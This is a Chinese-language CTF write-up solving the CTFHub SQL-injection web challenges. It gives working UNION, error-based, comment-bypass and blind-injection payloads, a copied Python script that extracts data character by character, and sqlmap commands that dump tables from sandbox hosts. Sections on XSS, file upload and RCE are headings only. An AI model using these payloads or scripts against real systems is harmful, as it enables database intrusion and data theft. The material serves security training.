  • CTFHub web部分题解

    web

    SQL注入

    整数型注入

    select * from news where id=1
    

    ID: 1
    Data: ctfhub

    select * from news where id=65535 union select 1,database()
    

    ID: 1
    Data: sqli

    select * from news where id=65535 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
    

    ID: 1
    Data: news,flag

    select * from news where id=65535 union select 2,group_concat(column_name) from information_schema.columns where table_name="flag"
    

    ID: 2
    Data: flag

    select * from news where id=65535 union select 1,flag from sqli.flag
    

    ID: 1
    Data: ctfhub{b4e5f56292df47714a3505cb8e7db7ec3841564e}

    字符型注入

    select * from news where id='65535' union select 1,database()#
    ID: 1
    Data: sqli
    
    select * from news where id='65535' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#'
    ID: 1
    Data: news,flag
    
    select * from news where id='65535' union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#'
    ID: 1
    Data: flag
    
    select * from news where id='65535' union select 1,flag from sqli.flag#'
    ID: 1
    Data: ctfhub{55f091a136f1d09a3a47a0199345ec740f1b19bb}
    

    报错注入

    select * from news where id=1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'sqli&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'news&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'flag&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select column_name from information_schema.columns where table_name="flag" limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'flag&1' for key 'group_key'
    
    select * from news where id=id=1 union select count(*),concat((select flag from sqli.flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'ctfhub{1485dddbf741f771c95612e0c824f68e50e4ebaf}&1' for key 'group_key'
    

    布尔盲注

    https://blog.csdn.net/weixin_44732566/article/details/104417351

    抄的脚本

    import requests
    import time
    
    # Base URL of the challenge instance; every probe expression is appended as the id value.
    urlOPEN = "http://challenge-ef71d5f8c726bea8.sandbox.ctfhub.com:10080/?id="
    # Timing samples; only the commented-out benchmark lines further down refer to this list.
    starOperatorTime = []
    # Substring the functions below search for in the response body to count a probe as true.
    mark = "query_success"
     
    def database_name():
        """Recover the current database name through a boolean oracle.

        Each request places ``if(<guess>, 1, <subquery>)`` in the ``id`` parameter
        and treats a response containing ``mark`` as "guess is true".  The false
        branch selects every table_name from information_schema.tables, which
        presumably makes the statement fail so the marker is missing (confirm
        against the target).  Only positions 1-8 and lowercase letters are tried;
        a position with no matching letter is skipped silently.  Progress and the
        final value are printed; nothing is returned.

        Seen from the server this is up to 8 * 26 near-identical GET requests
        whose id value carries substr()/information_schema text, and it relies on
        id being concatenated into the SQL text rather than bound as a parameter.
        """
        recovered = ''
        alphabet = 'sqcwertyuioplkjhgfdazxvbnm'
        template = 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))'
        for position in range(1, 9):
            for letter in alphabet:
                response = requests.get(urlOPEN + template % (position, letter))
                if mark not in response.text:
                    continue
                recovered += letter
                print(recovered)
                # First matching letter wins; move on to the next position.
                break
        print('database_name:', recovered)


    # Runs immediately when the script is executed.
    database_name()
     
    def table_name():
        """Recover up to four table names of the current schema via the same oracle.

        Rows 0-3 of information_schema.tables (filtered on table_schema=database())
        are addressed with ``limit <row>,1``; for each row, positions 1-8 are
        compared against lowercase letters only.  A row that does not exist, or a
        character outside the alphabet, contributes nothing, so entries may be
        empty or shortened.  The collected list is printed; nothing is returned.
        """
        tables = []
        alphabet = 'sqcwertyuioplkjhgfdazxvbnm'
        template = 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))'
        for row in range(0, 4):
            letters = []
            for position in range(1, 9):
                for letter in alphabet:
                    response = requests.get(urlOPEN + template % (row, position, letter))
                    if mark in response.text:
                        letters.append(letter)
                        break
            tables.append(''.join(letters))
        print('table_name:', tables)

    # Disabled timing harness kept from the original script:
    # start = time.time()
    table_name()
    # stop = time.time()
    # starOperatorTime.append(stop - start)
    # print("average time taken: " + str(sum(starOperatorTime) / 100))
    
    def column_name():
        """Recover column names of the ``flag`` table in the current schema.

        ``range(0, 3)`` addresses rows 0-2 (at most three columns) and
        ``range(1, 9)`` addresses positions 1-8 (at most eight characters per
        name); only lowercase letters are compared.  Missing rows or unmatched
        characters leave the entry empty or shortened.  The list is printed;
        nothing is returned.
        """
        columns = []
        alphabet = 'sqcwertyuioplkjhgfdazxvbnm'
        template = 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))'
        for row in range(0, 3):
            collected = ''
            for position in range(1, 9):
                # Lazily issue one request per letter and stop at the first hit.
                match = next(
                    (
                        letter
                        for letter in alphabet
                        if mark in requests.get(urlOPEN + template % (row, position, letter)).text
                    ),
                    None,
                )
                if match is not None:
                    collected += match
            columns.append(collected)
        print('column_name:', columns)

    column_name()
    
    def get_data():
        """Recover the value returned by ``select flag from flag`` character by character.

        ``range(1, 50)`` covers positions 1-49 and ``range(48, 126)`` covers
        character codes 48-125 (digits through ``}``), compared with ``ascii()``
        on the server.  A position with no matching code is skipped.  Each partial
        value and the final one are printed; nothing is returned.  In the worst
        case this sends 49 * 78 sequential requests to the same endpoint.
        """
        value = ''
        template = 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))'
        for position in range(1, 50):
            # Generator keeps the original request order and stops at the first hit.
            code = next(
                (
                    candidate
                    for candidate in range(48, 126)
                    if mark in requests.get(urlOPEN + template % (position, candidate)).text
                ),
                None,
            )
            if code is None:
                continue
            value += chr(code)
            print(value)
        print('value:', value)

    get_data()
    

    时间盲注

    https://www.cnblogs.com/0yst3r-2046/p/12486654.html

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 --dbs

    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

    Database: sqli
    [2 tables]
    +------+
    | flag |
    | news |
    +------+

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

    Database: sqli
    Table: flag
    [1 column]
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | flag   | varchar(100) |
    +--------+--------------+

    Database: sqli
    Table: flag
    [1 entry]
    +--------------------------------------------------+
    | flag                                             |
    +--------------------------------------------------+
    | ctfhub{1b434bc37227050f91a3c6d89839c3d46caddc27} |
    +--------------------------------------------------+

    MySQL结构

    SQL注入之sqlmap进阶

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 --dbs

    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli

    Database: sqli
    [2 tables]
    +------------+
    | news       |
    | yqoedxnbyv |
    +------------+

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -Tyqoedxnbyv --columns

    Database: sqli
    Table: yqoedxnbyv
    [1 column]
    +------------+--------------+
    | Column     | Type         |
    +------------+--------------+
    | xlmnukvowy | varchar(100) |
    +------------+--------------+

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns --dump

    Database: sqli
    Table: yqoedxnbyv
    [1 entry]
    +--------------------------------------------------+
    | xlmnukvowy                                       |
    +--------------------------------------------------+
    | ctfhub{f1a6d4ca1299a361ac6c24a3467eacad28e33462} |
    +--------------------------------------------------+

    Cookie注入

    https://www.cnblogs.com/0yst3r-2046/p/12493132.html

    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" --dbs --level 2
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -D sqli --tables --level 2
    
    Database: sqli
    [2 tables]
    +------------+
    | news       |
    | ylhikalyfo |
    +------------+
    
    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -T ylhikalyfo --columns --dump --level 2
    
    Database: sqli
    Table: ylhikalyfo
    [1 entry]
    +--------------------------------------------------+
    | purywifqom                                       |
    +--------------------------------------------------+
    | ctfhub{9fdae54dfbd16b2b8e8362efaa630d2e837ae597} |
    +--------------------------------------------------+
    

    UA注入

    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 --dbs
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
    
    Database: sqli
    [2 tables]
    +------------+
    | news       |
    | stjztvvqvb |
    +------------+
    
    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -T stjztvvqvb --columns --dump
    
    Database: sqli
    Table: stjztvvqvb
    [1 entry]
    +--------------------------------------------------+
    | wckzncyvgh                                       |
    +--------------------------------------------------+
    | ctfhub{0103df815affd10439bf1ed48520d8f39618e590} |
    +--------------------------------------------------+
    

    Refer注入

    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 --dbs
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
    
    Database: sqli
    [2 tables]
    +---------+
    | 2ews    |
    | hfuiwsi |
    +---------+
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm --columns
    
    Database: sqli
    Table: hfuiwsiotm
    [1 column]
    +------------+--------------+
    | Column     | Type         |
    +------------+--------------+
    | zuzhumkhnd | varchar(100) |
    +------------+--------------+
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm -C  zuzhumkhnd --dump
    
    Database: sqli
    Table: hfuiwsiotm
    [1 entry]
    +--------------------------------------------------+
    | zuzhumkhnd                                       |
    +--------------------------------------------------+
    | ctfhub{d61711c950c746b5cc93caaf5ae33c1dfd2f1cd0} |
    +--------------------------------------------------+
    

    过滤空格

    https://www.cnblogs.com/anweilx/p/13156216.html

    65535/**/union/**/select/**/1,database()

    ID: 1
    Data: sqli
    
    65535/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
    
    ID: 1
    Data: zzmpdgadiv,news
    
    65535/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="zzmpdgadiv"
    
    ID: 1
    Data: bxphkegikc
    
    65535/**/union/**/select/**/1,bxphkegikc/**/from/**/zzmpdgadiv
    
    ID: 1
    Data: ctfhub{93c21f537ae0bd573387788c7c4e1bf71e64d233}
    

    XSS

    反射型

    参考链接:https://blog.csdn.net/solitudi/article/details/107544165

    文件上传

    无验证

    AntSword 中国蚁剑的下载安装配置(附下载文件)

    题解

    前端验证

    .htaccess

    MIME绕过

    00截断

    双写后缀

    文件头检查

    RCE

    eval执行

    文件包含

    php://input

    读取源代码

    远程包含

    命令注入 过滤cat 过滤空格

    过滤目录分隔符 过滤运算符 综合过滤练习

    Bypass disable_function

  • 原文地址:https://www.cnblogs.com/qing123tian/p/13404454.html